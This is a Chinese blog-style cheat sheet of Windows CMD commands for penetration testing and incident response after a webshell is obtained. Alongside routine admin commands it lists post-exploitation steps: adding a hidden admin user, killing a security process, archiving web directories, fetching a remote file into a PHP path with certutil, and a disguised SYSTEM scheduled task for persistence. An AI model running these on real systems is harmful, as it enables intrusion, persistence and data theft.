滲透測試與應急響應常用CMD命令

在web滲透測試過程中,當我們通過某個漏洞利用成功獲取到webshell後,下一步便要通過webshell進行提權或打包數據。由於webshell對遠程服務器的操控,是通過命令行而非圖形化界面實現的,因此,滲透過程中熟悉常用的命令十分有必要,本文總結了一些滲透測試時常用的CMD命令。
————————————————

ipconfig
ipconfig /all #查看當前網卡
ipconfig /release #釋放網卡上的ip地址,網卡不禁用
ipconfig /flushdns #刷新DNS解析緩存
ipconfig /renew #更新指定網卡的ipv4地址,用於客戶端獲取dhcp
ipconfig /displaydns #獲取當前主機的dns緩存記錄
net
  • net user     #查看當前有哪些用戶
net user xiaoming 123456 /add	#添加用戶xiaoming,設置密碼爲123456
net user xiaoming #查看用戶xiaoming的信息
net user xiaoming /del #刪除用戶xiaoming
net user /domain  #判斷用戶是否是域成員
  • net localgroup #查看當前有哪些組
net localgroup administrators #查看administrators組有哪些成員
net localgroup administrators xiaoming /add #將xiaoming添加到administrators組中
  • net start #查看網絡中的服務
net start service_name
net stop service_name
whoami     #查看當前用戶名及權限
whoami /user #查看當前用戶SID
netstat
netstat -ano #查看當前網絡連接情況
netstat -anbv #獲取進程名、調用組件的路徑
systeminfo     #查看當前計算機版本、架構、補丁等基本信息
msinfo32 #獲取詳細系統硬件信息、環境變量
start /wait msinfo32.exe /report c:\list.txt /categariesswenv+SWEnvRunningTasks
ver     #查看當前windows版本
tasklist /svc     #查看當前進程的主持服務
taskkill /im /f safe.exe     #強行殺掉safe.exe進程
query user     #查看當前哪些用戶在線
logoff 1     #終止會話ID爲1的會話
cacls     #顯示或修改文件的訪問控制列表
dir /ah     #顯示具有隱藏屬性的文件
del /ah /f autorun.inf     #強制刪除具有隱藏屬性的文件autorun.inf
attrib -s -r -h autorun.inf     #清除文件的系統s、只讀r、隱藏h屬性
mstsc /admin /v: 192.168.0.22:3389     #突破遠程桌面連接2個用戶同時登陸
  • mstsc /console /v:192.168.0.11:3389     #突破遠程桌面連接2個用戶同時登陸
wmic process > process.txt     #查看所有進程及路徑,重定向到process文本文件
sc 命令     #用來服務控制管理器和服務進行通信
sc create servername binpath="c:\test.exe" start=auto displayname="Test Service" #創建一個Test Service的服務
sc start servername #啓動服務
sc delet servername #刪除服務
sc stop servername #關閉服務
ntbackup命令
ntbackup backckup c:\inetpub\wwwroot /j "my job" /f "c:back.bkf" #使用windows自帶命令打包文件
rar命令
rar.exe a -ag -k -r -s -m1 d:\webs\1.rar d:\webs  #把d:\webs\目錄下所有內容打包爲1.rar放到d:\webs目錄下
  • a 添加文件到壓縮文件中
  • -k 鎖定壓縮文件
  • -s 產生固體存檔
  • -ag :當創建壓縮文件時,以格式“YYYYMMDDHHMMSS”附加當前日期字符串,文件名bakYYYYMMDDHHMMSS.rar;
type命令 #相當於Linux的cat命令,查看文件內容。
certutil命令下載 #功能相當於linux的curl命令
certutil -urlcache -f "http://10.10.10.170/test.txt" a.php
schtasks計劃任務命令
schtasks /create /RL HIGHEST /F /RU "SYSTEM" /TN "WindowsS" /TR "C:/test.exe" /SC DAILY /MO 1 /ST 00:00
  • /RL:設置任務的運行級別。有效值爲LIMITED和HIGHEST。默認爲LIMITED。
  • /F:如果指定的任務已存在,則強制創建任務並禁止警告的值。
  • /RU:指定運行任務的用戶上下文。
  • /TN:指定唯一標識計劃任務的名稱。
  • /TR:指定要在計劃的時間運行的任務的路徑和文件名。
  • /SC:指定計劃頻率,DAILY爲每天。
  • /MO:對於MINUTE,HOURLY,DAILY,WEEKLY有效,可選參數,默認爲1.
  • /ST:指定運行任務的開始時間,格式爲HH:mm(24小時制)。
schtasks /run /TN "WindowsS"
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章